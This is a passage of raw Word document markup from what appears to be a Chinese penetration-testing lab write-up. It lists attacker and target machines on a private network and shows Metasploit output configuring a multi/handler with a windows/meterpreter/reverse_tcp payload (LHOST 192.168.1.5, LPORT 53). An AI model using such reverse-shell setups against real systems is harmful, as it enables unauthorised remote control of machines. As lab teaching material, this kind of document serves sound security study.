        <w:t>攻击机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> 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192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:tab/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Debian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101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3971"/>
        </w:tabs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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> 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7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101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5" w:lineRule="auto"/>
        <w:ind w:left="2161" w:right="0" w:firstLine="0"/>
      </w:pP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192.168.1.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> 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2003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42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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机配置：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paylo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ad：windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4911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msf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exploit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multi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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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)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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show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options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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5151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3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Module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options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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9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multi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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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)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: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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26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Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4791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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="383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9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Payload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options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12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windows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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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: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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26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Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34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Description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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22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EXITFUNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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Exit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technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Accepted: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659800"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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29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seh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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29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thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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proce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404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3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404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>none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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27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specifi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404549"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="15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LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20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53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="19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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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port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16</w:t>
      </w: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17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7942" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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target: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19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13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Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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Name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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="24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Wildcard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="23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Target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group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:155.52pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,3101">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:3101" coordorigin="10402,0" coordsize="0,3101" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,6,10402,7,10402,9,10402,10,10402,12,10402,14,10402,17,10402,19,10402,22,10402,25,10402,28,10402,32,10402,36,10402,40,10402,44,10402,49,10402,54,10402,60,10402,66,10402,72,10402,78,10402,85,10402,93,10402,100,10402,109,10402,117,10402,126,10402,136,10402,146,10402,156,10402,167,10402,179,10402,191,10402,203,10402,216,10402,230,10402,244,10402,258,10402,273,10402,289,10402,306,10402,323,10402,340,10402,359,10402,377,10402,397,10402,417,10402,438,10402,460,10402,482,10402,505,10402,529,10402,553,10402,578,10402,604,10402,631,10402,658,10402,686,10402,715,10402,745,10402,776,10402,807,10402,840,10402,873,10402,907,10402,942,10402,977,10402,1014,10402,1052,10402,1090,10402,1130,10402,1170,10402,1211,10402,1254,10402,1297,10402,1341,10402,1386,10402,1432,10402,1480,10402,1528,10402,1577,10402,1628,10402,1679,10402,1731,10402,1785,10402,1840,10402,1895,10402,1952,10402,2010,10402,2069,10402,2130,10402,2191,10402,2254,10402,2318,10402,2383,10402,2449,10402,2516,10402,2585,10402,2655,10402,2726,10402,2798,10402,2872,10402,2947,10402,3023,10402,3101e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:370" coordorigin="1490,970" coordsize="8990,370" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1035,10484,1037,10484,1039,10484,1042,10484,1044,10484,1046,10484,1048,10484,1051,10484,1053,10484,1056,10484,1058,10484,1061,10484,1064,10484,1067,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1089,10484,1093,10484,1097,10484,1100,10484,1104,10484,1108,10484,